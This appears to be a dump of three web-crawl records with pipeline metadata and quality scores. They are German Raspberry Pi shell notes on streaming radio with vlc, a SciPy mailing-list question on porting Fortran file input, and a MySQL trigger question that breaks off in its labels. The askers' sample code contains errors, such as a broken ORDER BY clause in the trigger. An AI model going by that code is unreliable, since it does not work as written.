1) ls -1s /boot
2) dpkg -l 'linux-[ihs]*' | sed '/^ii/!d;/'"$(uname -r | sed "s/\([-0-9]*\)-\([^0-9]\+\)/\1/")"'/d;s/^[^ ]* [^ ]* \([^ ]*\).*/\1/;/[0-9]/!d'
selaw2
raspberry pi Grafische Konsole auf deinem PC starten
ssh -X [email protected] lxpanel
selaw2
vls aus Kommandozeile: Das Kommando nvlc
nvlc http://metafiles.gl-systemhaus.de/hr/hrinfo_1.m3u
# damit hören sie "hrinfo" - Livestream von HR-Info
###########
pi@raspberrypi:~ $ ps -ef | grep vlc | grep -v grep
pi 6212 1 9 23:15 ? 00:02:32 /usr/bin/vlc -I dummy http://metafiles.gl-systemhaus.de/hr/hrinfo_1.m3u
##############
*/1 * * * * /usr/local/bin/radio_hr-info
cat /usr/local/bin/radio_hr-info
#!/bin/bash
#/usr/bin/vlc http://metafiles.gl-systemhaus.de/hr/hrinfo_2.m3u &
if [ `ps -ef | grep vlc | grep -v grep | wc -l` -ne 1 ]
then cvlc http://metafiles.gl-systemhaus.de/hr/hrinfo_1.m3u &
else echo "ok"
fi
Es wird jeder Minute geprüft, ob Radio eingeschaltet ist. Falls nicht, dann wird cvlc mit hrinfo_1.m3u gestartet:
cvlc http://metafiles.gl-systemhaus.de/hr/hrinfo_1.m3u &
PS: Erfahrungsgemäß bricht die Verbindung zum Portal metafiles.gl-systemhaus.de/hr/hrinfo leider (aus ungeklärtem Grund) sporadisch ab. Ich habe eine "Krücke" gefunden. Im crontab habe ich folgendes Skript eingetragen:
*/1 * * * * /usr/local/bin/radio_hr-info
cat /usr/local/bin/radio_hr-info
#!/bin/bash
#/usr/bin/vlc http://metafiles.gl-systemhaus.de/hr/hrinfo_2.m3u &
B=`date +"%d"``date +%"m"``date +"%y"`_`date | awk '{print $4}' | sed s/\:/-/g`;
if [ `ps -eLf | grep vlc | grep -v grep | wc -l` -ne 5 ]
then
ps -eLf | grep vlc | grep -v grep > /tmp/vlc_$B
kill -9 `ps -eLf | grep vlc | grep -v grep | awk '{print $2}'`;
cvlc http://metafiles.gl-systemhaus.de/hr/hrinfo_2.m3u &
else echo "ok"
fi
---------
Das Skript prüft, ob Prozesse von vlc laufen. Die Stückzahl der Prozessen sollte 5 sein. Falls das nicht der Fall sein sollte, werden die Prozesse gekillt und mit dem Kommando: cvlc http://metafiles.gl-systemhaus.de/hr/hrinfo_2.m3u &
wird die Musikausgabe erneut gestartet - und es funktioniert ;)
selaw2
break unter bashing
#!/bin/bash
i=0
while [[ $i -lt 10 ]]
do
echo "Number: $i"
((i++))
if [[ $i -eq 5 ]]; then
break
fi
done
selaw2
continue unter bashing
#!/bin/bash
i=0
while [[ $i -lt 5 ]]; do
((i++))
if [[ "$i" == '2' ]]; then
continue
fi
echo "Number: $i"
done
selaw2
Radio aus Konsole hören
selaw2
Online-Radio
Das Problem: Online-Radio bricht ab und zu ab (der Ton verschwindet).
D.h., dass Prozess-Zahl ändert sich.
Normalerweise die Zahl der vlc-Prozesse gleich 6:
A=`ps -AT | grep vlc | awk '{print $2}' | wc -l`
echo $A
6
------------------------------------
#!/bin/bash
# Variablendefinizion
A=`ps -AT | grep vlc | awk '{print $2}' | wc -l`
if [ $A -eq 6 ];
then
echo "OK";
else
# Falls die Zahl der Prozesse nicht equivalent 6, dann sollen die "Reste" des vlc-Prozess gekillt werden
kill `ps -AT | grep vlc | awk '{print $2}'`;
cvlc http://xxxxxxxxxxxxhrinfo_2.m3u &
fi
------------------------------------
selaw2
Umgebung nach wlan-Geräte scannen
# sudo iwlist wlan0 scan | grep ESSID
|
{
"url": "http://computerkurse-darmstadt.de/?q=de/comment/154",
"source_domain": "computerkurse-darmstadt.de",
"snapshot_id": "crawl=CC-MAIN-2022-49",
"warc_metadata": {
"Content-Length": "91293",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:HNPCCB5TKSMQNQPPV54V3MOZI4Y6RV3C",
"WARC-Concurrent-To": "<urn:uuid:8ea1cc1c-d44f-40a6-b6c8-7264edc4ed6a>",
"WARC-Date": "2022-12-08T08:53:44Z",
"WARC-IP-Address": "81.169.145.78",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:NL7GTFM3MM4EPAVOZ7U752IQMQMXVJPG",
"WARC-Record-ID": "<urn:uuid:bde77f81-dc47-4b67-b21c-68248ae730f5>",
"WARC-Target-URI": "http://computerkurse-darmstadt.de/?q=de/comment/154",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:4edff531-c8d8-4242-8519-8f88fa3d50fa>"
},
"warc_info": "isPartOf: CC-MAIN-2022-49\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for November/December 2022\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-150\r\nsoftware: Apache Nutch 1.19 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.4-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
100,
101,
118,
134,
141,
241,
249,
250,
268,
269,
589,
590,
720,
745,
746,
747,
872,
873,
889,
1001,
1002,
1018,
1151,
1152,
1168,
1169,
1191,
1192,
1208,
1209,
1213,
1232,
1233,
1299,
1415,
1464,
1465,
1469,
1488,
1489,
1573,
1574,
1578,
1579,
1582,
1601,
1602,
1630,
1631,
1688,
1689,
1731,
1732,
1788,
1789,
1796,
1823,
1824,
1904,
1905,
2007,
2008,
2011,
2049,
2050,
2129,
2130,
2142,
2182,
2183,
2190,
2228,
2229,
2321,
2322,
2358,
2359,
2407,
2408,
2427,
2428,
2614,
2615,
2650,
2651,
2677,
2678,
2691,
2692,
2728,
2729,
2764,
2765,
2778,
2779,
2859,
2860,
2873,
2874,
2922,
2923,
2926,
2949,
2950,
2973,
2974,
2978,
3006,
3007,
3070,
3071,
3114,
3115,
3122,
3123,
3129,
3152,
3153,
3220,
3221,
3316,
3317,
3344,
3345,
3349,
3350,
3354,
3368,
3369,
3497,
3498,
3529,
3530,
3532,
3533,
3540,
3554,
3555,
3562,
3563,
3631,
3632,
3769,
3770,
3787,
3788,
3883,
3884,
3909,
3910,
4006,
4007,
4014,
4048,
4049,
4109,
4110,
4148,
4179,
4191,
4227,
4272,
4381,
4402,
4408,
4431,
4491,
4498,
4501,
4502,
4533,
4680,
4862,
4863,
4874,
4922,
4923,
4930,
4965,
4966,
5202,
5272,
5273,
5285,
5328,
5371,
5412,
5510,
5511,
5597,
5598,
5678,
5679,
5693,
5736,
5772,
5813,
5814,
5884,
5902,
5908,
5933,
5934,
5943,
5971,
5972,
5975,
5976,
6135,
6136,
6143,
6168,
6169,
6313,
6354,
6355,
6367,
6445,
6446,
6576,
6621,
6622,
6629,
6657,
6658,
6764,
6798,
6837,
6838,
6850,
6889,
6920,
6962,
6963,
7097,
7131,
7374,
7617,
7715,
7734,
7778,
7841,
7889,
7908,
7923,
7937,
7946,
8001,
8041,
8080,
8089,
8111,
8143,
8156,
8168,
8175,
8206,
8246,
8250,
8270,
8273,
8284,
8300,
8305,
8347,
8376,
8381,
8386,
8391,
8439,
8455,
8470,
8484,
8493,
8604,
8632,
8637,
8642,
8647,
8688,
8755,
8789,
8809,
8828,
8842,
8900,
8919,
8921,
8923,
8925,
8988,
9040,
9041,
9048,
9081,
9082,
9094,
9126,
9165,
9208,
9216,
9224,
9247,
9259,
9268,
9300,
9301,
9310,
9318,
9319,
9336,
9337,
9342,
9343,
9386,
9399,
9488,
9493,
9494,
9513,
9514,
9517,
9518,
9556,
9637,
9735,
9815,
9918,
9921,
9922,
9929,
9971,
9972,
10087,
10099,
10141,
10176,
10210,
10217,
10256,
10264,
10304,
10328,
10370,
10388,
10432,
10480,
10498,
10619,
10652,
10703,
10733,
10775,
10823,
10863,
10902,
10963,
11066,
11089,
11212,
11233,
11234,
11320,
11321,
11328,
11350,
11351,
11367,
11508,
11509,
11516,
11569,
11570,
11600,
11601,
11608,
11649,
11650,
11705,
11757,
11769,
11821,
11922,
11937,
11978,
12011,
12023,
12089,
12145,
12207,
12222,
12225,
12339,
12396,
12397,
12616,
12657,
12690,
12702,
12768,
12849,
12906,
12911,
12959,
13023,
13080,
13081,
13096,
13099,
13109,
13343,
13407,
13408,
13415,
13435,
13436,
13448,
13452,
13453,
13475,
13478,
13496,
13504,
13528,
13534,
13537,
13542,
13543,
13550,
13573,
13574,
13586,
13590,
13591,
13616,
13624,
13651,
13660,
13663,
13681,
13686,
13687,
13694,
13718,
13725,
13738,
13739,
13809,
13846,
13896,
13897,
13946,
13954,
13956,
13993,
14005,
14006,
14028,
14029,
14078,
14079,
14096,
14097,
14102,
14103,
14114,
14115,
14120,
14121,
14226,
14227,
14272,
14273,
14312,
14313,
14316,
14353,
14354,
14361,
14395,
14396
],
"line_end_idx": [
100,
101,
118,
134,
141,
241,
249,
250,
268,
269,
589,
590,
720,
745,
746,
747,
872,
873,
889,
1001,
1002,
1018,
1151,
1152,
1168,
1169,
1191,
1192,
1208,
1209,
1213,
1232,
1233,
1299,
1415,
1464,
1465,
1469,
1488,
1489,
1573,
1574,
1578,
1579,
1582,
1601,
1602,
1630,
1631,
1688,
1689,
1731,
1732,
1788,
1789,
1796,
1823,
1824,
1904,
1905,
2007,
2008,
2011,
2049,
2050,
2129,
2130,
2142,
2182,
2183,
2190,
2228,
2229,
2321,
2322,
2358,
2359,
2407,
2408,
2427,
2428,
2614,
2615,
2650,
2651,
2677,
2678,
2691,
2692,
2728,
2729,
2764,
2765,
2778,
2779,
2859,
2860,
2873,
2874,
2922,
2923,
2926,
2949,
2950,
2973,
2974,
2978,
3006,
3007,
3070,
3071,
3114,
3115,
3122,
3123,
3129,
3152,
3153,
3220,
3221,
3316,
3317,
3344,
3345,
3349,
3350,
3354,
3368,
3369,
3497,
3498,
3529,
3530,
3532,
3533,
3540,
3554,
3555,
3562,
3563,
3631,
3632,
3769,
3770,
3787,
3788,
3883,
3884,
3909,
3910,
4006,
4007,
4014,
4048,
4049,
4109,
4110,
4148,
4179,
4191,
4227,
4272,
4381,
4402,
4408,
4431,
4491,
4498,
4501,
4502,
4533,
4680,
4862,
4863,
4874,
4922,
4923,
4930,
4965,
4966,
5202,
5272,
5273,
5285,
5328,
5371,
5412,
5510,
5511,
5597,
5598,
5678,
5679,
5693,
5736,
5772,
5813,
5814,
5884,
5902,
5908,
5933,
5934,
5943,
5971,
5972,
5975,
5976,
6135,
6136,
6143,
6168,
6169,
6313,
6354,
6355,
6367,
6445,
6446,
6576,
6621,
6622,
6629,
6657,
6658,
6764,
6798,
6837,
6838,
6850,
6889,
6920,
6962,
6963,
7097,
7131,
7374,
7617,
7715,
7734,
7778,
7841,
7889,
7908,
7923,
7937,
7946,
8001,
8041,
8080,
8089,
8111,
8143,
8156,
8168,
8175,
8206,
8246,
8250,
8270,
8273,
8284,
8300,
8305,
8347,
8376,
8381,
8386,
8391,
8439,
8455,
8470,
8484,
8493,
8604,
8632,
8637,
8642,
8647,
8688,
8755,
8789,
8809,
8828,
8842,
8900,
8919,
8921,
8923,
8925,
8988,
9040,
9041,
9048,
9081,
9082,
9094,
9126,
9165,
9208,
9216,
9224,
9247,
9259,
9268,
9300,
9301,
9310,
9318,
9319,
9336,
9337,
9342,
9343,
9386,
9399,
9488,
9493,
9494,
9513,
9514,
9517,
9518,
9556,
9637,
9735,
9815,
9918,
9921,
9922,
9929,
9971,
9972,
10087,
10099,
10141,
10176,
10210,
10217,
10256,
10264,
10304,
10328,
10370,
10388,
10432,
10480,
10498,
10619,
10652,
10703,
10733,
10775,
10823,
10863,
10902,
10963,
11066,
11089,
11212,
11233,
11234,
11320,
11321,
11328,
11350,
11351,
11367,
11508,
11509,
11516,
11569,
11570,
11600,
11601,
11608,
11649,
11650,
11705,
11757,
11769,
11821,
11922,
11937,
11978,
12011,
12023,
12089,
12145,
12207,
12222,
12225,
12339,
12396,
12397,
12616,
12657,
12690,
12702,
12768,
12849,
12906,
12911,
12959,
13023,
13080,
13081,
13096,
13099,
13109,
13343,
13407,
13408,
13415,
13435,
13436,
13448,
13452,
13453,
13475,
13478,
13496,
13504,
13528,
13534,
13537,
13542,
13543,
13550,
13573,
13574,
13586,
13590,
13591,
13616,
13624,
13651,
13660,
13663,
13681,
13686,
13687,
13694,
13718,
13725,
13738,
13739,
13809,
13846,
13896,
13897,
13946,
13954,
13956,
13993,
14005,
14006,
14028,
14029,
14078,
14079,
14096,
14097,
14102,
14103,
14114,
14115,
14120,
14121,
14226,
14227,
14272,
14273,
14312,
14313,
14316,
14353,
14354,
14361,
14395,
14396,
14433
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 14433,
"ccnet_original_nlines": 481,
"rps_doc_curly_bracket": 0.0011085700243711472,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.07335556298494339,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.028493480756878853,
"rps_doc_frac_lines_end_with_ellipsis": 0.03941908851265907,
"rps_doc_frac_no_alph_words": 0.3873901069164276,
"rps_doc_frac_unique_words": 0.41468802094459534,
"rps_doc_mean_word_length": 5.574820518493652,
"rps_doc_num_sentences": 180,
"rps_doc_symbol_to_word_ratio": 0.08063048869371414,
"rps_doc_unigram_entropy": 6.127985000610352,
"rps_doc_word_count": 1811,
"rps_doc_frac_chars_dupe_10grams": 0.015451660379767418,
"rps_doc_frac_chars_dupe_5grams": 0.07735736668109894,
"rps_doc_frac_chars_dupe_6grams": 0.0664619728922844,
"rps_doc_frac_chars_dupe_7grams": 0.059726618230342865,
"rps_doc_frac_chars_dupe_8grams": 0.024366090074181557,
"rps_doc_frac_chars_dupe_9grams": 0.020206019282341003,
"rps_doc_frac_chars_top_2gram": 0.009805859997868538,
"rps_doc_frac_chars_top_3gram": 0.008419180288910866,
"rps_doc_frac_chars_top_4gram": 0.005942950025200844,
"rps_doc_books_importance": -1433.7784423828125,
"rps_doc_books_importance_length_correction": -1433.7784423828125,
"rps_doc_openwebtext_importance": -742.9721069335938,
"rps_doc_openwebtext_importance_length_correction": -742.9721069335938,
"rps_doc_wikipedia_importance": -518.9638061523438,
"rps_doc_wikipedia_importance_length_correction": -518.9638061523438
},
"fasttext": {
"dclm": 0.7257333993911743,
"english": 0.026036180555820465,
"fineweb_edu_approx": 1.6780916452407837,
"eai_general_math": 0.049485091120004654,
"eai_open_web_math": 0.11407226324081421,
"eai_web_code": 0.44225364923477173
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.1",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "004.076",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computers and Computer science"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "4",
"label": "Analyze"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "5",
"label": "Social/Forum"
},
"secondary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "18",
"label": "Q&A Forum"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-114,337,870,829,860,080
|
[SciPy-dev] Input value from data file to 2D array
tournesol tournesol33@gmail....
Thu Apr 17 22:23:57 CDT 2008
Hi All.
I'm a newbie of python and scipy, numpy and
try to rewriting the Fortran77 code to Python.
First, here is my Fortran code.
DIMENSION A(10,10), B(10,10)
OPEN(21,FILE='aaa.dat')
DO 10 K=1,2
READ(21,1602) ((A(I,J),J=1,3),I=1,2)
READ(21,1602) ((B(I,J),J=1,3),I=1,2)
10 CONTINUE
WRITE(6,1602) ((A(I,J),J=1,3),I=1,2)
WRITE(6,1602) ((B(I,J),J=1,3),I=1,2)
1602 FORMAT(3I4)
END
and aaa.dat file is
0 1 1
1 1 1
2 1 1
; ; ;
; ; ;
18 1 1
19 1 1
The code is going to read each value of the data file(aaa.dat)
and input the value to the array A, B. According the "DO 10 K=1,2"
which means a loop of Fortran it is going to try to read 1st 2x3 array
and set them to A, also read 2nd 2x3 array to B.
Two "WRITE(6,1602) "s mean that the final value of array A and B are
3rd 2x3 array adn 4th 2x3 array
4 1 1
5 1 1
6 1 1
7 1 1
Question 1: How to input value from data file to 2D array ?
Can I write code like following ?
a=zeros([2,3], Float)
for i in range(1,2):
for j in range(1,3):
a[i][j]=i,j
(If the size of data file is very big , using
read_array() or fromfile() will be very hard. )
Question 2: Such like "DO 10 K=1,1500", I just read a part of
data file(<=very big file). How cat write this with Python ?
Any advice please!
More information about the Scipy-dev mailing list
|
{
"url": "https://mail.scipy.org/pipermail/scipy-dev/2008-April/008891.html",
"source_domain": "mail.scipy.org",
"snapshot_id": "crawl=CC-MAIN-2016-18",
"warc_metadata": {
"Content-Length": "3890",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:SOK7TSLQ4XPOI2VE5Y6R4RVGWNHLNTAM",
"WARC-Concurrent-To": "<urn:uuid:292764bc-60e1-4550-a4ee-654eb77f8ee4>",
"WARC-Date": "2016-05-06T01:55:27Z",
"WARC-IP-Address": "23.253.247.54",
"WARC-Identified-Payload-Type": null,
"WARC-Payload-Digest": "sha1:E5OIDAJJBFLMBNZB3W6FKZC3D5LYWZO5",
"WARC-Record-ID": "<urn:uuid:56835696-198c-4683-b522-2b5c704a54a7>",
"WARC-Target-URI": "https://mail.scipy.org/pipermail/scipy-dev/2008-April/008891.html",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:36523b3f-578b-4692-b0d1-df4b3b7101a5>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-239-7-51.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2016-18\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web for April 2016\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
51,
52,
84,
113,
114,
115,
123,
124,
168,
215,
216,
248,
249,
278,
302,
314,
351,
388,
400,
437,
474,
491,
495,
496,
516,
517,
523,
529,
535,
542,
548,
555,
562,
563,
626,
693,
764,
813,
882,
914,
915,
923,
929,
935,
941,
942,
943,
1003,
1037,
1038,
1061,
1062,
1087,
1112,
1128,
1129,
1175,
1223,
1224,
1286,
1347,
1348,
1367,
1368,
1369,
1370,
1371,
1372,
1373,
1374,
1375,
1376
],
"line_end_idx": [
51,
52,
84,
113,
114,
115,
123,
124,
168,
215,
216,
248,
249,
278,
302,
314,
351,
388,
400,
437,
474,
491,
495,
496,
516,
517,
523,
529,
535,
542,
548,
555,
562,
563,
626,
693,
764,
813,
882,
914,
915,
923,
929,
935,
941,
942,
943,
1003,
1037,
1038,
1061,
1062,
1087,
1112,
1128,
1129,
1175,
1223,
1224,
1286,
1347,
1348,
1367,
1368,
1369,
1370,
1371,
1372,
1373,
1374,
1375,
1376,
1425
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 1425,
"ccnet_original_nlines": 72,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.19264069199562073,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.11255411058664322,
"rps_doc_frac_lines_end_with_ellipsis": 0.013698630034923553,
"rps_doc_frac_no_alph_words": 0.4740259647369385,
"rps_doc_frac_unique_words": 0.52226722240448,
"rps_doc_mean_word_length": 3.878542423248291,
"rps_doc_num_sentences": 16,
"rps_doc_symbol_to_word_ratio": 0.002164500067010522,
"rps_doc_unigram_entropy": 4.475227355957031,
"rps_doc_word_count": 247,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.06471815705299377,
"rps_doc_frac_chars_dupe_6grams": 0.06471815705299377,
"rps_doc_frac_chars_dupe_7grams": 0.06471815705299377,
"rps_doc_frac_chars_dupe_8grams": 0.06471815705299377,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.022964509204030037,
"rps_doc_frac_chars_top_3gram": 0.009394570253789425,
"rps_doc_frac_chars_top_4gram": 0.037578288465738297,
"rps_doc_books_importance": -208.23785400390625,
"rps_doc_books_importance_length_correction": -206.8702850341797,
"rps_doc_openwebtext_importance": -98.6573486328125,
"rps_doc_openwebtext_importance_length_correction": -98.6573486328125,
"rps_doc_wikipedia_importance": -91.85539245605469,
"rps_doc_wikipedia_importance_length_correction": -85.69672393798828
},
"fasttext": {
"dclm": 0.23009544610977173,
"english": 0.721106231212616,
"fineweb_edu_approx": 2.3239028453826904,
"eai_general_math": 0.42953962087631226,
"eai_open_web_math": 0.09378933906555176,
"eai_web_code": 0.02427799068391323
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.133",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "518",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Mathematics",
"level_3": "Numerical analysis"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "5",
"label": "Social/Forum"
},
"secondary": {
"code": "4",
"label": "Code/Software"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "18",
"label": "Q&A Forum"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "2",
"label": "Partially Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "4",
"label": "Graduate/Expert Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
3,282,282,658,966,165,000
|
1
How to create customize primary key in MySQL?, example i have table and the table name is X, I have a table field as ID,Code,Name.
I am afraid if I have 1000 users and when they input together will result in destruction
and i want to :
INSERT INTO `X` (`ID`,`Code`,`Name`) VALUES
('P3K','Alex'), // this primary key is "P3K-1"
('SOS','Force'), // this primary key is "SOS-1"
('P3K','Bash'), // this primary key is "P3K-2"
Right now, i using TRIGGER (BEFORE INSERT) for this, like this one:
SET NEW.`ID` = CONCAT(NEW.`Code`,'-',IFNULL(SUBSTRING_INDEX((
SELECT `x`.`Code` FROM `X` WHERE
X.`Code` = NEW.`Code` and
ORDER BY X.`Code` DESC
LIMIT 1 ),'-',-1),0) + 1))
I did not try this code, but my point is:
1. User insert
2. Before insert I checking LAST Primary
3. IF Null then i set 0, else i cut the symbol (-) and take the last part
4. I increments (using [+ 1])
5. Final, i concat CODE and New Number.
am i misguided? LOL, and if true, how to create like this one? (I THINK) We can do it and maybe no one knows about this, how does AI in MySQL work so perfectly?
2
Do not make auto_increment any column you want to manipulate explicitly. That can confuse an engine and cause serious problems. If no column you have used for primary key are auto_increment you can do anything you want with them via triggers. Sure generated values will be rejected if they violate the mandatory uniqness of the primary key.
Your Answer
By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
{
"url": "https://dba.stackexchange.com/questions/187162/mysql-set-trigger-before-insert-for-new-id-is-safe",
"source_domain": "dba.stackexchange.com",
"snapshot_id": "crawl=CC-MAIN-2019-51",
"warc_metadata": {
"Content-Length": "127186",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:VVNGL7EFBVL67GM67RFY44UUM5HPD5CK",
"WARC-Concurrent-To": "<urn:uuid:f566f902-0e00-4a9c-94b4-e4e16e4d6482>",
"WARC-Date": "2019-12-12T15:52:32Z",
"WARC-IP-Address": "151.101.65.69",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:BT2N6XUD7BUYTPDV7L6VUC67ZG7RIGNX",
"WARC-Record-ID": "<urn:uuid:9097ff37-53f0-42d6-b07e-e0bb7415f435>",
"WARC-Target-URI": "https://dba.stackexchange.com/questions/187162/mysql-set-trigger-before-insert-for-new-id-is-safe",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:e596fb7f-1bad-431c-9e7f-51effdeb15b1>"
},
"warc_info": "isPartOf: CC-MAIN-2019-51\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for December 2019\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-128.ec2.internal\r\nsoftware: Apache Nutch 1.16 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
2,
3,
134,
135,
224,
225,
241,
242,
287,
334,
382,
429,
430,
498,
499,
561,
597,
628,
651,
678,
679,
721,
722,
739,
782,
858,
890,
932,
933,
1094,
1095,
1097,
1098,
1439,
1440,
1452,
1453,
1553,
1554
],
"line_end_idx": [
2,
3,
134,
135,
224,
225,
241,
242,
287,
334,
382,
429,
430,
498,
499,
561,
597,
628,
651,
678,
679,
721,
722,
739,
782,
858,
890,
932,
933,
1094,
1095,
1097,
1098,
1439,
1440,
1452,
1453,
1553,
1554,
1644
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 1644,
"ccnet_original_nlines": 39,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.330788791179657,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.11959288269281387,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.28498727083206177,
"rps_doc_frac_unique_words": 0.5812274217605591,
"rps_doc_mean_word_length": 4.256317615509033,
"rps_doc_num_sentences": 23,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.7874860763549805,
"rps_doc_word_count": 277,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.050890590995550156,
"rps_doc_frac_chars_top_3gram": 0.03562340885400772,
"rps_doc_frac_chars_top_4gram": 0.040712468326091766,
"rps_doc_books_importance": -193.44964599609375,
"rps_doc_books_importance_length_correction": -179.7657470703125,
"rps_doc_openwebtext_importance": -100.86810302734375,
"rps_doc_openwebtext_importance_length_correction": -100.86810302734375,
"rps_doc_wikipedia_importance": -71.92552185058594,
"rps_doc_wikipedia_importance_length_correction": -59.468421936035156
},
"fasttext": {
"dclm": 0.30914419889450073,
"english": 0.7913400530815125,
"fineweb_edu_approx": 1.52329683303833,
"eai_general_math": 0.0002508799952920526,
"eai_open_web_math": 0.03956305980682373,
"eai_web_code": 0.0000016699999605407356
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.746",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "005.1",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "5",
"label": "Social/Forum"
},
"secondary": {
"code": "4",
"label": "Code/Software"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
